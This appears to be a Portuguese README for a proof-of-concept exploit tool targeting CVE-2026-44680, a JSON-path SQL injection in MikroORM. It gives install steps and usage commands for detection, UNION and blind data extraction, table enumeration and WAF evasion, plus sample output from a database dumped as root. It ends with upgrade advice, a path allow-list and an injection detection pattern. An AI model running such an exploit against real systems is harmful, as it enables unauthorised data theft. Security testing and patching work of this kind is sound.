
Ferramenta PoC para CVE-2026-44680 que afeta o MikroORM ≤7.0.13. Explora a injeção de caminho JSON para extrair o conteúdo do banco de dados por meio de ataques baseados em UNION. Oferece detecção de vulnerabilidades, extração automatizada de dados, enumeração de tabelas e suporte a injeção cega. Inclui integração de proxy para Burp Suite e técnicas de evasão de WAF.
Ferramenta Profissional de Prova de Conceito para Pesquisadores de Segurança
CVE-2026-44680 é uma vulnerabilidade crítica de injeção SQL que afeta o MikroORM, um ORM TypeScript popular para Node.js. Este framework de exploit fornece a pesquisadores de segurança e testadores de penetração uma ferramenta profissional para detectar e explorar a vulnerabilidade.
Autor: Sudeepa Wanigarathna
Versão: 1.0.0
Classificação: Ferramenta Profissional de Pesquisa em Segurança
| Atributo | Valor |
|---|
| CVE ID | CVE-2026-44680 |
| Pontuação CVSS | 7.6 (Alta) |
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Baixos |
@mikro-orm/knex <= 6.6.13@mikro-orm/sql <= 7.0.13O MikroORM não escapa adequadamente as chaves de caminho JSON controladas em tempo de execução ao construir consultas JSON_EXTRACT. Atacantes podem sair do contexto do caminho JSON e injetar código SQL arbitrário.
| Recurso | Descrição | Status |
|---|---|---|
| Detecção de Vulnerabilidade | Detecção baseada em tempo e em erros | ✅ |
| Extração do Banco de Dados | Versão, banco de dados, usuário, hostname | ✅ |
| Enumeração de Tabelas | Descoberta automática de todas as tabelas | ✅ |
| Injeção Baseada em UNION | Extrai dados via UNION SELECT | ✅ |
| Injeção Cega | Extração de caracteres baseada em booleanos | ✅ |
| Suporte a Proxy | Burp Suite / proxy de interceptação | ✅ |
| Geração de Relatórios | Relatórios TXT profissionais | ✅ |
| Evasão de WAF | Técnicas avançadas de ofuscação | ✅ |
# Python 3.8 or higher
python3 --version
# pip package manager
pip --version
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit
# Using requirements.txt
pip install -r requirements.txt
# Or install manually
pip install requests colorama tqdm urllib3 simplejson
python exploit.py --help
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0
# Full exploitation
python exploit.py -u http://localhost:3000
# Vulnerability detection only
python exploit.py -u http://target.com --detect
# Extract database information
python exploit.py -u http://target.com --extract
# Enumerate tables
python exploit.py -u http://target.com --enumerate
| Flag | Descrição | Padrão |
|---|---|---|
-u, --url | URL alvo (obrigatório) | - |
-e, --endpoint | Endpoint da API | /api/users/search |
-p, --proxy | Proxy HTTP | Nenhum |
-v, --verbose | Saída detalhada (verbose) | Falso |
--detect | Apenas detectar vulnerabilidade | Falso |
--extract | Extrair informações do banco de dados | Falso |
--enumerate | Enumerar tabelas | Falso |
--blind | Modo de injeção cega | Falso |
python exploit.py -u http://192.168.1.100:3000
python exploit.py -u http://target.com -e /api/v2/users/query
python exploit.py -u http://target.com -p http://127.0.0.1:8080
python exploit.py -u http://target.com -v --extract
python exploit.py -u http://target.com --blind
python exploit.py -u http://target.com --detect
python exploit.py -u http://target.com --extract
python exploit.py -u http://target.com --enumerate
============================================================
MikroORM CVE-2026-44680 Exploitation Framework
Author: Sudeepa Wanigarathna
============================================================
[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection
[+] Vulnerability confirmed!
[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin
===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000
[*] VULNERABILITY DETAILS
- CVE: CVE-2026-44680
- CVSS Score: 7.6 (High)
- Affected Components: @mikro-orm/knex <= 6.6.13
[*] DATABASE INFORMATION
- Version: 10.11.6-MariaDB
- Database: production_db
- User: root@localhost
- Hostname: localhost
[*] ENUMERATED TABLES (5 found)
1. users
2. products
3. orders
4. payments
5. admin
[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt
exploit_report_1742493645.txt # Complete exploitation report
tables_1742493645.txt # List of discovered tables
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];
function validateJsonPath(key) {
if (!ALLOWED_JSON_PATHS.includes(key)) {
throw new Error('Invalid JSON path');
}
return key;
}
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "
IMPORTANTE: Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais.
Este projeto é licenciado sob a Licença MIT.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...
Feito com ❤️ para a Comunidade de Pesquisa em Segurança